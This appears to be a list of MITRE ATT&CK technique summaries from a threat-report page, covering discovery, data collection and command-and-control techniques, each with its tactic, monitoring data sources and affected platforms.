Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre